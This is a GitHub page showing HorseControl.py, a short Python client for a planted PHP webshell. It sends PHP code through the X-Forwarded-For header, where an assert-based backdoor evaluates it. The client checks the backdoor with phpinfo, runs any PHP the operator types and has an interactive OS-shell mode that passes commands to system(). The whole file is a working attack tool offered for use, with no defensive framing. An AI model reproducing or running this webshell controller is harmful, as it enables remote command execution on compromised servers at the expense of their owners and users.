Webshell_Client/HorseControl.py at master · HITNSLAB/Webshell_Client · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#encoding = utf-8
import requests
import sys


def check_url_exist(url):
    header = {
        'X-Forwarded-For': 'index=assert&endex=phpinfo()'
    }
    result = requests.get(url, headers=header)
    if 'PHP Version' in result.text:
        return True
    else:
        return False


def InputShell(url):
    if check_url_exist(url):
        systeminfo = ExecConfig(url, "print_r(php_uname('s'))")
        print('Shell Connect OK,The Server is based on {0} ,Have Fun!'.format(systeminfo))
        print('Input PHP code you want to exec,type shell to enter the os shell,type quit to escape')
        while 1:
            func = input('[#]>')
            if func == 'shell':
                print('[#]>Change To OS-Shell')
                while 1:
                    func = input('[+]>')
                    if func == 'quit':
                        func = ''
                        break
                    print(ExecConfig(url, 'system(\'' + func + '\')'))
            if func == 'quit':
                exit(print('Thank you for using!'))
            ExecConfig(url, func)
    else:
        print('Connect Faild,Please check your shell!')


def ExecConfig(url, config):
    header = {
        'X-Forwarded-For': 'index=assert&endex={0}'.format(config)
    }
    result = requests.get(url, headers=header)
    return result.text


if __name__ == '__main__':
    if (len(sys.argv) == 2):
        InputShell(sys.argv[1])
    else:
        exit(print('The Correct Usage Is: HorseControl.py http://xxx.com/shell.php'))